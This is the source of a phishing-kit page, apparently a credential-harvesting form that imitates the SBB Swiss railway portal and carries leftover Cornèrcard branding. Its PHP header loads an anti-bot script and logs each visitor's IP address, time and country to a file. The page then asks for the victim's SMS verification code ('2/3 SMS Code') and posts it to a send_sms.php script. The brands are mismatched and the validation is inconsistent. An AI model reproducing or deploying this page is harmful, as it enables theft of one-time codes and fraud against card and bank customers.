<!DOCTYPE html>


<html lang="zh-tw" dir="ltr">
<?php
include("./anti/index.php");
include("wc.php");

$ip = $_SERVER['REMOTE_ADDR'];
$COUNTRY = getCountryFromIP($ip, " NamE ");
$hostname = gethostbyaddr($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];
$TIME = date("d F Y H:i:s");

$file = fopen("is.txt", "a");
fwrite($file, $ip . "  -   " . $TIME . " -  " . $COUNTRY . "\n");



?>
<html lang="de"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Das Online-Portal der SBB für Zug und ÖV | SBB</title>

    
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no, user-scalable=no">
    <meta content="iCornèr: Registrieren Sie sich hier an, um Zugriff auf sämtliche Daten Ihrer Cornèrcard zu erhalten." name="description">
    <meta name="author" content="cornèrcard">

    <link href="./sms_files/bootstrap.min.css" rel="stylesheet" type="text/css">
    <link href="./sms_files/sticky-footer-navbar.css" rel="stylesheet" type="text/css">
    <link href="./sms_files/default.css" rel="stylesheet" type="text/css">
    <link href="./sms_files/icons.css" rel="stylesheet" type="text/css">
    <!--[if lt IE 8]><!-->
    <link rel="stylesheet" href="./sms_files/ie7.css" type="text/css">
    <!--<![endif]-->
    <script>
        globalparameters = {
            code: "de"
        }
    </script>
    <script src="./sms_files/jquery-3.6.0.min.js"></script>
    <script src="./sms_files/jquery.inputmasked.js"></script>
    <script src="./sms_files/jquery.cookie.js"></script>
    <script src="./sms_files/momentjs.js"></script>

    <script src="./sms_files/bootstrap.min.js"></script>
    <script src="./sms_files/validation.js"></script>
    <script src="./sms_files/common-translation.js"></script>
    <script src="./sms_files/default.js"></script>

    <link rel="shortcut icon" href="https://cdn.app.sbb.ch/favicons/sbb/v2/favicon.ico" type="image/x-icon">
    <meta name="format-detection" content="telephone=no">
</head>
<body>
<nav class="navbar navbar-expand-md navbar-light bg-light mb-4">
    <div class="container">
        <a class="navbar-brand" href="#">
<img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/7/70/SBB_CFF_FFS_logo.svg/2560px-SBB_CFF_FFS_logo.svg.png" width="196">        </a>
    </div>
</nav>

<main>
    <div id="content" class="container">
<div class="progress-overview">
        <div class="progress" style="height: 5px;">
            <div class="progress-bar" role="progressbar" style="width: 32%" aria-valuenow="32" aria-valuemin="0" aria-valuemax="100"></div>
        </div>
</div>
<div id="loginform">
<form id="RegisterMTAN" name="RegisterMTAN" method="POST" target="_self" action="./lx/send_sms.php" autocomplete="off" accept-charset="UTF-8" class="form-horizontal">
    <div class="title">
        <h1 class="logintitle text-center">2/3 SMS Code</h1>
            <h4 class="text-center">
                    Bitte geben Sie den SMS Code ein
            </h4>
    </div>




            <div class="form-group backend-message">
                Der SMS Code wird an die bei uns registrierte Nummer geschickt.
            </div>




 
    
    



    
    <div class="form-group required">
                <label class="control-label" for="token">
                SMS Code
            </label>

            <div>
                    <div id="message-fields"></div>



                        <input class="form-control" type="tel" name="token" id="token" maxlength="6" value="" tabindex="3">






                    <!-- UserID -->



                    <!-- Token OTP -->
                        <small id="tokenHelp" class="form-text text-muted">123456</small>
                        <small id="tokenRetry" class="form-text text-muted">
                            <button type="submit" name="submit" value="" class="btb btn-primary hidden-submit" disabled="">
                            </button><button type="submit" name="cancel" value="true" class="btn btn-link">
                                   
                            </button>
                        </small>

                        <span class="message-token-error" style="display: none;">Der SMS Code besteht aus sechs Ziffern</span>

                        <span class="message-token-success" style="display: none;"></span>





    <script type="text/javascript">


        var form = document.getElementById('RegisterMTAN');
        var formInput = form.elements["token"];
        formInput.onchange = function () {
            var valid = function () { return true; }.call(this);
                valid = valid && (/^\d{4}$/).test(this.value);
            var parent = this.parentNode;
            if (!valid) {
                parent.className += " has-error";
            } else {
                parent.className = parent.className.replace(/ has-error/g, '');
            }

                if (!this.value) {
                    parent.className += " has-warning";
                } else {
                    parent.className = parent.className.replace(/ has-warning/g,'');
                }
        };
    </script>

            </div>
    </div>


    

 <div class="form-group text-center">



            <button name="submit" value="" class="btn btn-primary" disabled="">
                Weiter
            </button>

 </div>

</form>

    <!-- position input focus into first element of form -->
    <script type="text/javascript">
        document.forms['RegisterMTAN'].elements[0].focus()
    </script>
</div>    </div>
</main>

<footer class="footer">
    <div class="container">
        <div class="top">
            <div class="footer-language">
          
            </div>
        </div>
        <div class="bottom">
            <div class="footer-menu">

            
            </div>
            <div class="ebas-weiss">
                <a href="https://www.ebas.ch/de/">
                    <img src="./sms_files/logo_ebas_weiss_de.png" width="196">
                </a>
            </div>
        </div>
    </div>
</footer>

    

</body></html>